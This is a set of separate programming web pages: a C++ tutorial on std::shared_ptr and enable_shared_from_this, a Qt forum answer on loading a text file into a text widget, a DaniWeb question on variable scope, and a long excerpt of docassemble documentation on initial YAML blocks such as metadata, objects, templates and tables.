#include <iostream> #include <memory> using namespace std; class embeddedWorld { public: embeddedWorld(int p_no): planetNo(p_no) {} ~embeddedWorld() { cout << "called Embedded World Destructor, planet No: " << planetNo << endl; }; int getPlanetNo() const { return planetNo; }; private: int planetNo = 0; }; int main() { { std::shared_ptr<embeddedWorld> e1(make_shared<embeddedWorld> (10)); std::shared_ptr<embeddedWorld> e2 = e1; embeddedWorld *myEmbeddedWorld = new embeddedWorld(5); std::shared_ptr<embeddedWorld> e3(e2, myEmbeddedWorld); cout << "e1 or e2 planet No: " << e1->getPlanetNo() << endl; cout << "e3 planet No: " << e3->getPlanetNo() << endl; } return 0; } Output: “e1 or e2 planet No: 10 e3 planet No: 5 called Embedded World Destructor, planet No: 10” If we take a look at the code above: we create two instances, e1 and e2, with shared ownership of an embeddedWorld object whose planet number is 10. Afterward, we create an instance named e3, sharing ownership with e1 and e2, but it holds the pointer to a new embeddedWorld object named myEmbeddedWorld, whose planet number is 5. All instances are localized with braces in the main function so that we can observe all of them going out of scope. When all of them go out of scope, the object behind the pointer myEmbeddedWorld remains, but we have no way to access it anymore. That's why we need to make sure the unmanaged pointer, myEmbeddedWorld, remains valid as long as that owned object exists.
Let’s take a look at this example: #include <iostream> #include <memory> #include <vector> using namespace std; class embeddedWorld; std::vector<std::shared_ptr<embeddedWorld> unionWorlds; class embeddedWorld { public: embeddedWorld(int p_no): planetNo(p_no) {} int getPlanetNo() const { return planetNo; }; void saveToUnion() { unionWorlds.push_back(std::shared_ptr<embeddedWorld> (this)); } private: int planetNo = 0; }; int main() { { std::shared_ptr<embeddedWorld> e1(make_shared<embeddedWorld> (10)); e1->saveToUnion(); } cout << unionWorlds.at(0).use_count() << endl; cout << unionWorlds.at(0)->getPlanetNo(); return 0; } Our managed class is embeddedWorld and it has a function to save itself to unionWorld collect class such as std::vector. When it saves itself in the vector with std::shared_ptr<embeddedWorld>(this), then, the new shared pointer instance is created with the new control block. There will be two shared smart pointers with different ownership but the same object (this). When the e1 instance goes out of scope, and we write it in localized block to see this risk, the managed object (this) will be deleted with its deleter. Afterward, when we want to reach the object via the vector, unionWorld, we will get the different instances with the deleted resources (this). For preventing this issue, the library: memory has a class we can publicly inherit: std::enable_shared_from_this. It provides a function named shared_from_this to return itself with the same ownership. 
This technique is also called CRTP. When we change the example above with this technique: #include <iostream> #include <memory> #include <vector> using namespace std; class embeddedWorld; std::vector<std::shared_ptr<embeddedWorld>> unionWorlds; class embeddedWorld: public std::enable_shared_from_this<embeddedWorld> { public: embeddedWorld(int p_no): planetNo(p_no) {} int getPlanetNo() const { return planetNo; }; void saveToUnion() { unionWorlds.emplace_back(shared_from_this()); } private: int planetNo = 0; }; int main() { { std::shared_ptr<embeddedWorld> e1(make_shared<embeddedWorld> (10)); e1->saveToUnion(); cout << e1.use_count() << endl; // we see: 2 } cout << unionWorlds.at(0).use_count() << endl; // we see: 1, since e1 is gone cout << unionWorlds.at(0)->getPlanetNo(); // There is no risk anymore return 0; } The function std::make_shared provides advantages for performance and safety. We talked about the advantages of using the make-functions on the unique pointer side. Using the make_shared function prevents memory leakage. If we want to use a custom deleter, we need to know that the make_shared function doesn't allow a custom deleter. Now, we will create our own custom shared pointer class in the next article. Smart Pointers (4/6): std::weak_ptr Resources: std::shared_ptr std::make_shared Effective Modern C++ by Scott Meyers
https://myembeddedworld.com/smart-pointers-3-6/
I would like to open and read a text file at program launch, using Qt - pditty8811 last edited by I would like to open a text file at program launch, using Qt. I would like the text to appear in the text field which is called textEdit. It is a simple notepad program that I am changing into an app I want to do other special things. How do I input a text file, say "text.txt" into my textEdit widget upon program launch? All of the text file. Writing with C++. Thanks. - p3c0 Moderators last edited by Hi, You can open and read the file from your QMainWindow or QDialog's constructor. Try the following code: @ #include "mainwindow.h" #include "ui_mainwindow.h" #include <QFile> #include <QTextStream> MainWindow::MainWindow(QWidget *parent) : QMainWindow(parent), ui(new Ui::MainWindow) { ui->setupUi(this); loadFile(); } MainWindow::~MainWindow() { delete ui; } void MainWindow::loadFile() { QFile file(":/read.txt"); //If present in Resource // QFile file("D:/Test/read.txt"); //If present on system file.open(QIODevice::ReadOnly); QTextStream stream(&file); QString line = stream.readAll(); file.close(); ui->textEdit->setText(line); } @ - pditty8811 last edited by Thank you. That did it.
https://forum.qt.io/topic/32855/i-would-like-to-open-and-read-a-text-file-at-program-launch-using-qt
0 If I uncomment the 'int x;' above main, and comment out the int x = 0 inside of main, it works, but I don't want to use global variables. What I can't understand is why x is out of scope. The text I'm using says “vars having local or block scope may be used only in the part of the program between their definition and the block’s closing brace” - so if I declare x at the start of the main function, it seems like its scope should last until the end of the whole program, and x should be usable in all functions that follow its initialization. #include <iostream> using namespace std; void nonRefVarChanger(); //int x; int main () { int x = 0; nonRefVarChanger(); cout << "x is " << x << endl; return 0; } // Fn def void nonRefVarChanger() // also wanted to avoid passing by reference { x = 5; // error: 'x' was not declared in this scope }
https://www.daniweb.com/programming/software-development/threads/264343/scopes-trial
This section discusses blocks that will typically appear at the beginning of the YAML of your interview. If you are new to docassemble, you probably will not need to use “initial blocks” until you attempt something more advanced, so you can skip this section and proceed to the section on questions. Interview title and other metadata --- metadata: title: | Advice on Divorce short title: | Divorce description: | A divorce advice interview authors: - name: John Doe organization: Example, Inc. revision_date: 2015-09-28 --- A metadata block contains information about the interview, such as the name of the author. It must be a YAML dictionary, but each the dictionary items can contain any arbitrary YAML structure. If a title is defined, it will be displayed in the navigation bar in the web app. If a short title is provided, it will be displayed in place of the title when the size of the screen is small. If a logo is defined, it will be displayed in the navigation bar in the web app in place of the title and short title. The content of the logo should be raw HTML. If you include an image, you should size it to be about 20 pixels in height. If a tab title is provided, it will be displayed as the title of the browser tab. Otherwise, the title will be used. If a subtitle is provided, it will be displayed as the subtitle of the interview in the “Interviews” list available to a logged-in user at /interviews. These titles can be overridden using the set_parts() function. The metadata block and the set_parts() function can be used to modify other aspects of the navigation bar. If an exit link is provided, the behavior of the “Exit” link can be modified. (The “Exit” menu option is displayed when the show login configuration directive is set to False or the show login metadata specifier in an interview is set to False.) The value can be either exit, leave, or logout. 
If it is exit, then when the user clicks the link, they will be logged out (if they are logged in) and their interview answers will be deleted from the server. If it is leave, the user will be logged out (if they are logged in), but the interview answers will not be deleted from the server. (It can be important to keep the interview answers on the server if background tasks are still running.) If it is logout, then if the user is logged in, the user will be logged out, but if the user is not logged in, this will have the same effect as leave. If an exit url is provided, the user will be redirected to the given URL. If no exit url is provided, the user will be directed to the exitpage if the exit link is exit or leave, and directed to the login page if the user is logged in and exit link is logout. The exit url also functions as an interview-level default value in place of the system-wide exitpage, which is used by the command() function and used on special pages that show buttons or choices that allow users to exit or leave. If exit label is provided, the given text will be used in place of the word “Exit” on the “Exit” menu option. This text is passed through the word() function, so that it can be translated into different languages. If you set unlisted: True for an interview that has an entry in the dispatch list in your configuration, the interview will be exempted from display in the list of interviews available at /list. For more information about this, see the documentation for the dispatch configuration directive. If you set hidden: True, then interview sessions for this interview will be omitted from the “My Interviews” listing of sessions. (They will still be deleted by the “Delete All” button, though.) You can set tags to a list of one or more “tags” as a way of categorizing the interview.
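Putting these exit-related specifiers together, a metadata block customizing the exit behavior might look like the following sketch (the URL and label text here are hypothetical illustrations, not values from the documentation):

```yaml
metadata:
  title: |
    Advice on Divorce
  exit link: leave
  exit url: https://example.com/thank-you
  exit label: |
    Leave this interview
```

With these settings, the menu option would read “Leave this interview,” and clicking it would log the user out without deleting the interview answers, then redirect to the given URL.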
metadata: title: Write your will tags: - estates - wills The list of available interviews at /list and the list of interview sessions at /interviews make use of the metadata tags for filtering purposes. Note that the metadata of an interview are static, while the tags of a particular session of an interview are dynamic, and can be changed with session_tags(). If you set sessions are unique to True, then docassemble will resume an existing session for the user, if the user already has an existing session. This requires that the user be logged in, so the user will be redirected to the login screen if they try to access an interview for which sessions are unique is set to True. You can also set sessions are unique to a list of roles, in which case uniqueness will be enforced only if the user has one of the listed roles. If you set required privileges to a list of one or more privileges, then a user will only be able to use the interview if they have one of the given privileges. If anonymous is included as one of the required privileges, then users who are not logged in will be able to use the interview. However, note that anonymous is not actually a privilege in docassemble’s privilege management system; only logged-in users actually have privileges. If no required privileges are listed, then the default is that the interview can be used by anybody. metadata: title: Administrative interview short title: Admin description: | A management dashboard sessions are unique: True required privileges: - admin - developer - advocate If there are multiple metadata blocks in the YAML of an interview that set required privileges, the required privileges settings of later metadata blocks will override the required privileges settings of earlier metadata blocks. Setting required privileges: [] will ensure that the interview can be used, notwithstanding the required privileges settings of any earlier metadata blocks. 
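For example, to enforce session uniqueness only for users with certain roles, sessions are unique can be set to a list (the role names below are hypothetical):

```yaml
metadata:
  title: Client intake
  sessions are unique:
    - advocate
    - clerk
```

Users with other roles, or no login at all, would be able to start multiple sessions of this interview.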
The required privileges for listing metadata specifier is like required privileges, except it only controls whether the interview will be shown in the list of interviews available at /list. The required privileges metadata specifier also controls whether the interview will be listed there. For more information about the /list page, see the documentation for the dispatch configuration directive. You can set an error action if you want your interview to do something substantive in the event that your interview encounters an error that it would otherwise show to the user. A simple application of error action would be to replace the error screen with a question. When the interview encounters an error, the interview will run the action given by error action. In this case, error action is on_error, and calling this action shows a question to the user. An action can also run code that changes the interview logic. For example, an error action could skip through the remainder of the questions and present a final screen: metadata: error action: on_error --- event: on_error code: | healthy = False --- mandatory: True code: | if not healthy: fail_safe favorite_fruit favorite_vegetable favorite_number final_screen --- sets: fail_safe code: | if not defined('favorite_fruit'): favorite_fruit = '_________' if not defined('favorite_vegetable'): favorite_vegetable = '_________' if not defined('favorite_number'): favorite_number = '____' final_screen If the attempt to run the error action also results in an error, the latter error is shown on the screen in the usual fashion. See error help and verbose error messages for other ways to customize error messages. The metadata block also accepts specifiers for default content to be inserted into various parts of the screen. You can provide different values for different languages by setting each directive to a dictionary in which the keys are languages and the values are content.
metadata: post: en: | This interview was sponsored in part by a grant from the Example Foundation. es: | Esta entrevista fue patrocinada en parte por una beca de la Fundación Ejemplo. For information about other ways to set defaults for different parts of the screens during interviews, see the screen parts section. The metadata block also accepts the specifier error help. This is Markdown-formatted text that will be included on any error screen that appears to the user during the interview. You can also provide this text on a server-wide basis using the error help directive in the Configuration. To support multiple languages, you can set error help to a dictionary where the keys are language codes and the values are the error text to be shown for each language. This will not always be reliable, because an error might happen before the user’s language is known. The metadata block also accepts the specifier show login, which can be true or false. This controls whether the user sees a “Sign in or sign up to save answers” link in the upper right-hand corner during the interview. If show login is not specified in the metadata, the Configuration directive show login determines whether this link is available. By default, all of the functions and classes of docassemble.base.util are imported into the namespace of a docassemble interview. If you want to load names manually using a modules block, you can set suppress loading util to True: metadata: suppress loading util: True If suppress loading util is True, the only name that will be imported into your interview is process_action. Creating objects --- objects: - spouse: Individual - user.case: Case --- An objects block creates objects that may be referenced in your interview. See objects for more information about objects in docassemble. If your interview references the variable spouse, docassemble will find the above objects block and process it.
It will define spouse as an instance of the object class Individual and define user.case as an instance of the object class Case. The use of objects in docassemble interviews is highly encouraged. However, the objects you use as variables need to inherit from the class DAObject. Otherwise, docassemble might not be able to find the appropriate code blocks or questions necessary to define them. This is because of the way docassemble keeps track of the names of variables. A code block like this would effectively do the same thing as the objects block above: --- code: | spouse = Individual('spouse') user.initializeAttribute('case', Case) --- This code is more complicated than normal Python code for object initialization because the full name of the variable needs to be supplied to the function that creates and initializes the object. The base class DAObject keeps track of variable names. In some situations, running spouse = Individual() will correctly detect the variable name spouse, but in other situations, the name cannot be detected. Running spouse = Individual('spouse') will always set the name correctly. Whenever possible, you should use objects blocks rather than code to initialize your objects because objects blocks are clean and readable. You can also use objects blocks to initialize attributes of the objects you create. For information on how to do this, see the documentation for the using() method. Importing objects from file --- objects from file: - claims: claim_list.yml --- An objects from file block imports objects or other data elements that you define in a separate YAML or JSON data file located in the sources folder of the current package. If the interview file containing the objects from file block is data/questions/manage_claims.yml, docassemble will expect the data file to be located at data/sources/claim_list.yml.
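As a rough sketch of what such a data file might contain, data/sources/claim_list.yml could define a list of objects like this (a hypothetical illustration only; the objects_from_file() documentation is the authoritative source for the data file format, and the item names here are invented):

```yaml
# data/sources/claim_list.yml (hypothetical contents)
object: Thing
items:
  - name: Slip and fall
  - name: Breach of contract
```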
For more information about how this works, and about how to format the data file, see the documentation for the objects_from_file() function. The example above is equivalent to running claims = objects_from_file('claim_list.yml', name='claims'). If you set use objects to True, then the use_objects keyword parameter of the objects_from_file() function will be used. --- use objects: True objects from file: - claims: claim_list.yml --- This is equivalent to running claims = objects_from_file('claim_list.yml', name='claims', use_objects=True). Incorporation by reference: include --- include: - basic-questions.yml - docassemble.helloworld:questions.yml --- The include block incorporates the questions in another YAML file, almost as if the contents of the other YAML file appeared in place of the include block. When the included file is parsed, files referenced within it will be assumed to be located in the included file’s package. When a filename is provided without a package name, docassemble will look first in the data/questions directory of the current package (i.e., the package within which the YAML file being read is located), and then in the data/questions directory of docassemble.base. You can include question files from other packages by explicitly referring to their package names. E.g., docassemble.helloworld:questions.yml refers to the file questions.yml in the docassemble/helloworld/data/questions directory of that package. Images With attribution: image sets --- image sets: freepik: attribution: | Icon made by [Freepik]() images: baby: crawling.svg people: users6.svg injury: accident3.svg --- An image sets block defines the names of icons that you can use to decorate your questions. The file names refer to files located in the data/static directory of the package in which the YAML file is located. Since most free icons available on the internet require attribution, the image sets block allows you to specify what attribution text to use for particular icons. 
The web app shows the appropriate attribution text at the bottom of any page that uses one of the icons. The example above is for a collection of icons obtained from the web site Freepik, which offers free icons under an attribution-only license. The image sets block must be in the form of a YAML dictionary, where the names are the names of collections of icons. The collection itself is also a dictionary containing terms images and (optionally) an attribution. The images collection is a dictionary that assigns names to icon files, so that you can refer to icons by a name of your choosing rather than by the name of the image file. For information on how to use the icons you have defined in an image sets block, see decoration in the question modifiers section, buttons in the setting variables section, and “Inserting inline icons” in the markup section. Without attribution: images --- images: bills: money146.svg children: children2.svg --- An images block is just like an image sets block, except that it does not set any attribution information. It is simpler because you do not need to give a name to a “set” of images. The above images block is essentially equivalent to writing: --- image sets: unspecified: images: bills: money146.svg children: children2.svg --- Python modules Importing the module itself: imports --- imports: - datetime - us --- imports loads a Python module name into the namespace in which your code and question templates are evaluated. The example above is equivalent to running the following Python code: import datetime import us Importing all names in a module: modules --- modules: - datetime --- Like imports, modules loads Python modules into the namespace in which your code and question templates are evaluated, except that it imports all of the names that the module exports. 
The example above is equivalent to running the following Python code: from datetime import * Storing structured data in a variable The data block allows you to specify a data structure in YAML in a block and have it available as a Python data structure. For example, in this interview we create a Python list and then re-use it in two questions to offer a multiple-choice list: variable name: fruits data: - Apple - Orange - Peach - Pear In Python, the variable fruits is this: [u'Apple', u'Orange', u'Peach', u'Pear'] You can also use the data block to create more complex data structures. You can also use Mako in the data structure. variable name: fruits data: Apple: description: | The apple is a tasty red fruit. Everyone on ${ planet } loves to eat apples. seeds: 5 Orange: description: | The orange is, surprisingly, orange-colored. Most people on ${ planet } dislike eating oranges. seeds: 10 Peach: description: | The peach is a fragile fruit. There are 165,323 peach orchards on ${ planet }. seeds: 1 Pear: description: | The pear is variously yellow, green, or brown. The planet ${ planet } is shaped like a pear. seeds: 0 --- question: | On what planet were you born? fields: Planet: planet --- question: | What is your favorite fruit? field: user_favorite_fruit choices: code: fruits.keys() --- mandatory: True question: | Summary of ${ user_favorite_fruit } subquestion: | ${ fruits[user_favorite_fruit]['description'] } The ${ user_favorite_fruit } has ${ nice_number(fruits[user_favorite_fruit]['seeds']) } seeds. data blocks do not work the same way as template blocks. The Mako templating in a data block is evaluated at the time the variable indicated by variable name is defined. The text stored in the data structure is the result of processing the Mako templating. The Mako templating is not re-evaluated automatically each time a question is shown. You can also import data from YAML files using the objects_from_file() function.
Structured data in object form If you set use objects: True in a data block, then lists in your YAML will become DALists in the resulting data structure, and dictionaries in your YAML will become DADicts. The .gathered attribute of these objects will be set to True. In addition, when use objects: True is enabled, any dictionaries in the data structure will be transformed into a DAContext object if the keys of the dictionary are a non-empty subset of question, document, docx, pandoc. This is a useful shorthand for creating DAContext objects. Storing structured data in a variable using code The data from code block works just like the data block, except that Python code is used instead of text or Mako markup. variable name: fruits data from code: Apple: description: | ', '.join(['red', 'shiny', 'for teachers']) seeds: 10/2 Orange: description: | capitalize('round') + " and orange" seeds: seeds_in_orange Peach: description: peach_description seeds: 10**6 Pear: description: | "Like an apple, but not like an apple." seeds: 0 --- question: | How many seeds in an orange? fields: - no label: seeds_in_orange datatype: range min: 0 max: 100 --- question: | How would you describe a peach? fields: - no label: peach_description --- question: | What is your favorite fruit? field: user_favorite_fruit choices: code: fruits.keys() --- mandatory: True question: | Summary of ${ user_favorite_fruit } subquestion: | ${ fruits[user_favorite_fruit]['description'] } The ${ user_favorite_fruit } has ${ nice_number(fruits[user_favorite_fruit]['seeds']) } seeds. Structured data from code in object form The use objects modifier can also be used with data from code.
variable name: fruits use objects: True data from code: - question: | "Apple" document: | "red fruit" - question: | "Orange" document: | "fruit that rhymes " + "with nothing" - question: | "Peach" document: | "juicy fruit" docx: | "peachy peach" pandoc: | "very juicy " + "fruit" --- question: | What is your favorite fruit? fields: - Fruit: favorite_fruit datatype: object choices: fruits Keeping variables fresh: reset The reset block will cause variables to be undefined every time a screen loads. This can be helpful in a situation where a variable is set by a code block and the value of the variable ought to be considered afresh based on the user’s latest input. --- reset: - client_is_guilty - opposing_party_is_guilty --- Effectively, this causes variables to act like functions. Another way to use this feature is to set the reconsider modifier on a code block. This will have the same effect as reset, but it will apply automatically to all of the variables that are capable of being assigned by the code block. The reset block and the reconsider modifier are computationally inefficient because they cause extra code to be run every time a new screen loads. For a more computationally efficient alternative, see the reconsider() function Changing order of precedence As explained in how docassemble finds questions for variables, if there is more than one question or code block that offers to define a particular variable, blocks that are later in the YAML file will be tried first. If you would like to specify the order of precedence of blocks in a more explicit way, so that you can order the blocks in the YAML file in whatever way you want, you can tag two or more blocks with ids and insert an order block indicating the order of precedence of the blocks. For example, suppose you have an interview with two blocks that could define the variable favorite_fruit. 
Normally, docassemble will try the second block first because it appears later in the YAML file; the second block will “override” the first. However, if you actually want the first block to be tried first, you can manually specify the order of blocks: order: - informal favorite fruit question - regular favorite fruit question --- id: informal favorite fruit question question: | What the heck is your favorite fruit? fields: Fruit: favorite_fruit --- id: regular favorite fruit question question: | What is your favorite fruit? fields: Fruit: favorite_fruit --- mandatory: True question: | Your favorite fruit is ${ favorite_fruit }. Another way to override the order in which blocks will be tried is by using the id and supersedes question modifiers. Vocabulary terms and auto terms --- terms: enderman: | A slender fellow from The End who carries enderpearls and picks up blocks. fusilli: | A pasta shape that looks like a corkscrew. --- Sometimes you will use vocabulary that the user may or may not know. Instead of interrupting the flow of your questions to define every term, you can define certain vocabulary words, and docassemble will turn them into hyperlinks wherever they appear in curly brackets. When the user clicks on the hyperlink, a popup appears with the word’s definition. If you want the terms to be highlighted every time they are used, whether in curly brackets or not, use auto terms. You can also use terms and auto terms as question modifiers, in which case the terms will apply only to the question, not to the interview as a whole. When you use terms and auto terms as initial blocks, you cannot use Mako templating in the definitions, but when you use them as question modifiers, you can use Mako templating. The template block The word “template” has a number of different meanings. If you are interested in how to insert variables into the text of your questions or documents using the Mako templating syntax, see markup.
If you are interested in document assembly based on forms or document templates, see the Documents section. A template block allows you to assign text to a variable and then re-use the text by referring to a variable. template: disclaimer content: | The opinions expressed herein do not *necessarily* reflect the views of ${ company }. --- field: intro_screen question: Welcome to the interview! subquestion: | Greetings. We hope you learn something from this guided interview. ${ disclaimer } To get started, press **Continue**. The content of a template may contain Mako and Markdown. The name after template: is a variable name that you can refer to elsewhere. The template block, like question and code blocks, offers to define a variable. So when docassemble needs to know the definition of disclaimer and finds that disclaimer is not defined, it will look for a question, code, or template block that offers to define disclaimer. If it finds the template block above, it will define the disclaimer variable. Optionally, a template can have a subject: template: disclaimer subject: | Please be advised content: | The opinions expressed herein do not *necessarily* reflect the views of ${ company }. --- field: intro_screen question: Welcome to the interview! subquestion: | Greetings. We hope you learn something from this guided interview. To get started, press **Continue**. under: | ### ${ disclaimer.subject } ${ disclaimer.content } You can refer to the two parts of the template by writing, e.g., disclaimer.subject and disclaimer.content. Note that writing ${ disclaimer } has the same effect as writing ${ disclaimer.content }. You can also write ${ disclaimer.show() } (for interchangeability with images). To convert the subject and the content to HTML, you can write disclaimer.subject_as_html() and disclaimer.content_as_html(). These methods take the optional keyword argument trim. If True, the resulting HTML will not be in a <p> element. (The default is False.)
template objects are also useful for defining the content of e-mails. See send_email() for more information on using templates with e-mails. You might prefer to write text in Markdown files, rather than in Markdown embedded within YAML. To facilitate this, docassemble allows you to create a template that references a separate Markdown file. The file disclaimer.md is a simple Markdown file containing the disclaimer from the previous example. The content file is assumed to refer to a file in the “templates” folder of the same package as the interview source, unless a specific package name is indicated. (e.g., content file: docassemble.demo:data/templates/hello_template.md) In the example above, the sample interview is in the file docassemble.base:data/questions/examples/template-file.yml, while the Markdown file is located at docassemble.base:data/templates/disclaimer.md. If the content file specifier refers to a dictionary in which the only key is code, the code will be evaluated as Python code, and the result will be used as the file. code: | template_file_to_use = 'disclaimer.md' --- template: disclaimer content file: code: template_file_to_use --- field: intro_screen question: Welcome to the interview! subquestion: | Greetings. We hope you learn something from this guided interview. ${ disclaimer } To get started, press **Continue**. In this example, the code evaluated to the name of a file in the templates folder. The code may also evaluate to a URL, DAFile, DAFileList, DAFileCollection, or DAStaticFile. A template can also be inserted into a docx template file. This can be useful when you want to insert multiple paragraphs of text into a DOCX file. Ordinarily, when you insert text into a docx template file, newlines are replaced with spaces. The effect of inserting a template into a docx template file is controlled by the new markdown to docx directive in the Configuration. 
If you set new markdown to docx: True in the Configuration, then you should insert a template using: {{p the_template }} However, if you don’t set the new markdown to docx directive (the default of which is False), then you need to insert the template using: {{r the_template }} In the future, the default will change to True. The table block The table block works in much the same way as a template, except its content is a table that will be formatted appropriately whether it is included in a question or in a document. This block should be used when each row of your table represents an item in a group; that is, you do not know how many rows the table will contain, because the information is in a list, dictionary, or set. If you just want to format some text in a table format, see the documentation about tables in the markup section. In the following example, the variable fruit is a DAList of objects of type Thing, each of which represents a fruit. Each row in the resulting table will describe one of the fruits. The table: fruit_table line indicates the name of the variable that will hold the template for the table. The question block includes the table simply by referring to the variable fruit_table. The rows: fruit line indicates the variable containing the group of items that represent rows in the table. The fruit variable is a DAList that gets populated during the interview. columns describes the header of each column and what should be printed in each cell under that header. Like a fields list within a question, columns must contain a YAML list where each item is a key/value pair (a one-item dictionary) where the key is the header of the column and the value is a Python expression representing the contents of the cell for that column, for a given row. In the example above, the header of the first column is “Fruit Name” and the Python expression that produces the name of the fruit is row_item.name.
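The example described above is not reproduced in full here; reconstructed from the description, it might look like this sketch:

```yaml
table: fruit_table
rows: fruit
columns:
  - Fruit Name: |
      row_item.name
  - Number of Seeds: |
      row_item.seeds
---
question: |
  Information about fruit
subquestion: |
  Here is a fruity summary.

  ${ fruit_table }
```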
There are two special variables available to these Python expressions: row_item: this is the item in the group corresponding to the current row. row_index: this is 0 for the first row, 1 for the second row, 2 for the third row, etc. You can pretend that the Python expressions are evaluated in a context like this: row_index = 0 for row_item in fruit: # evaluation takes place here row_index = row_index + 1 In this example, the first column will show the name of the fruit (row_item.name) and the second column will show the number of seeds (row_item.seeds). The header of each column is plain text (not a Python expression). The header can include Mako and Markdown. If you have a complicated header, you can use the special keys header and cell to describe the header and the cell separately. (This is similar to using label and field within a fields list.) You can use Python to create cells with content that is computed from the items of a group. The above example prints the name of the fruit as a plural noun, and inflates the number of seeds. Remember that the Python code here is an expression, not a block of code. If you want to use if/then/else logic in a cell, you will need to use Python’s one-line form of if/then/else, e.g., 'Yes' if row_item.receives else 'No'. When fruit_table is inserted into the question, the result will be a Markdown-formatted table. This: question: | Information about fruit subquestion: | Here is a fruity summary. ${ fruit_table } will have the effect of this: question: | Information about fruit subquestion: | Here is a fruity summary. Fruit Name |Number of Seeds -----------|--------------- Apples |4 Oranges |3 Pears |6 For more information about Markdown-formatted tables, see the documentation about tables in the markup section. Instead of using a table block, you could construct your own Markdown tables manually using a Mako “for” loop. The advantages of using the table block are: - The table block describes the content of a table in a conceptual rather than visual way.
In Markdown, simple tables look simple, but complicated tables can look messy. The table block allows you to map out your ideas in outline form rather than squeezing everything into a single line that has a lot of punctuation marks. - The table block will attempt to set the relative table widths in a sensible way based on the actual contents of the table. If you create your own tables in Markdown, and the text in any cell wraps, the relative table widths of the columns will be decided based on the relative widths of the cells in the divider row (----|---------). You might not know in advance what the relative sizes of the text will be in each column. The table block acts like a template block in that the variable it sets will be a docassemble object. The .content attribute will be set to the text of the table in Markdown format. If the variable indicated by rows is empty, the table will display with only the headers. To suppress this, you can add show if empty: False to the table block. The resulting .content will be the empty string, "". If you would like a message to display in place of the table in the event that there are no rows to display, you can set show if empty to this message. Mako and Markdown can be used. The message will become the .content of the resulting object. If you include a table in the content of an attachment, you might find that the table is too wide, or not wide enough. Pandoc breaks lines, determines the relative width of columns, and determines the final width of a table based on the characters in the divider row (----|---------). By default, docassemble will construct a divider row that is no longer than 65 characters. This should work for standard applications (12 point font, letter size paper). You can change the number of characters from 65 to something else by setting the value of table width in a features block.
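For example, to allow the divider row to be up to 75 characters long, a features block along these lines could be added (a sketch based on the description above; 75 is an arbitrary illustrative value):

```yaml
features:
  table width: 75
```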
You can also use table blocks with DADict objects: scan for variables: False mandatory: True code: | income['employment'].receives = True income['employment'].amount = 237 income['benefits'].receives = False income['interest'].receives = True income['interest'].amount = 23 --- table: income.table rows: income columns: - Type: | row_index - Receives: | 'Yes' if row_item.receives else 'No' - Amount: | currency(row_item.amount) if row_item.receives else '' --- mandatory: True question: | Summary of income subquestion: | ${ income.table } When rows refers to a DADict, then in the columns, row_index represents the “key” and row_item represents the value of each item in the dictionary. You can pretend that the Python expressions under columns are evaluated in a context like this: for row_index in sorted(income): row_item = income[row_index] # evaluation takes place here Note that running sorted() on a dictionary returns an alphabetically sorted list of keys of the dictionary. In Python, iterating over a dictionary does not yield the keys in sorted order. The keys are sorted in this fashion so that the order of the rows in a table does not change every time the table appears on the screen. Exporting tables to Excel and other formats You can call the export() method on a table to get a DAFile representation of the table. For example, this interview provides a Microsoft Excel .xlsx file representation of a table: objects: - fruit: DAList --- mandatory: true code: | fruit.object_type = Thing --- mandatory: True question: | Information about fruit subquestion: | Here is a fruity summary. ${ fruit_table } You can also [download this information]. [download this information]: ${ fruit_table.export('fruit.xlsx', title='fruit').url_for() } --- table: fruit_table rows: fruit columns: - Fruit Name: row_item.name - Seeds: row_item.seeds - Last eaten: row_item.last_eaten This function uses the pandas module to export to various formats.
The export() method takes a filename, which is parsed to determine the file format you want to use. This can also be provided as the filename keyword parameter. If you omit the filename, you can indicate the file format using the file_format keyword parameter. The default file format is 'xlsx'. The valid file formats include csv, xlsx, and json. The title keyword parameter indicates the name of the data set. This is used as the name of the Microsoft Excel sheet. When the xlsx format is used, you can set the freeze_panes keyword parameter to False to turn off the Microsoft Excel “freeze panes” feature. Here are some examples of usage: fruit_table.export('fruit.xlsx'): returns a Microsoft Excel file called fruit.xlsx. fruit_table.export('fruit.xlsx', title='Fruits'): returns a Microsoft Excel file called fruit.xlsx where the sheet is named “Fruits”. fruit_table.export('fruit.xlsx', title='Fruits', freeze_panes=False): returns a Microsoft Excel file called fruit.xlsx where the sheet is named “Fruits” and the “freeze panes” feature is turned off. fruit_table.export('fruit.csv'): returns a comma-separated values file called fruit.csv. fruit_table.export(file_format='csv'): returns a comma-separated values file called file.csv. fruit_table.export(): returns a Microsoft Excel file called file.xlsx. Converting tables to a pandas dataframe If you want to work with your table as a pandas dataframe, you can call fruit_table.as_df() to obtain the information for the table as a pandas dataframe object. However, note that objects from the pandas package cannot necessarily be “pickled” by Python, so it is best if you call this method from functions in Python modules, or in such a way that the results do not get saved to variables in the interview. Using tables to edit groups You can use a table to provide the user with an interface for editing an already-gathered DAList or DADict. mandatory: True question: | All done subquestion: | The people are ${ person }.
Your favorite is ${ favorite }. ${ person.table } ${ person.add_action() } --- table: person.table rows: person columns: - Name: | row_item.name.full() - Fruit: | row_item.favorite_fruit edit: - name.first - favorite_fruit For more information about this feature, see the section on editing an already-gathered list in the section on groups. Defining the sections for the navigation bar You can use the navigation bar feature or the nav.show_sections() function to show your users the “sections” of the interview and what the current section of the interview is. Here is a complete example. Subsections are supported, but only one level of nesting is allowed. If your interview uses multiple languages, you can specify more than one sections block and modify each one with a language modifier: --- language: en sections: - Introduction - Fruit - Vegetables - Conclusion --- language: es sections: - Introducción - Fruta - Vegetales - Conclusión --- If no language is specified, the fallback language * is used. In the example above, the section modifier referred to sections using the same text that is displayed to the user. However, in some circumstances, you might want to use a shorthand to refer to a section, and update the actual section names displayed to the user without having to make changes in numerous places in your interview. You can do this by using key/value pairs in your sections block, and using the special key subsections to indicate subsections: sections: - intro: Introduction - about: About you subsections: - contact: Contact info - demographic: Demographics - prefs: Preferences - conclusion: Conclusion --- features: navigation: True --- mandatory: True question: | What is your name? fields: - First Name: first_name - Last Name: last_name section: contact --- mandatory: True question: | What is your e-mail address? fields: - E-mail: email_address datatype: email --- mandatory: True question: | What is your gender?
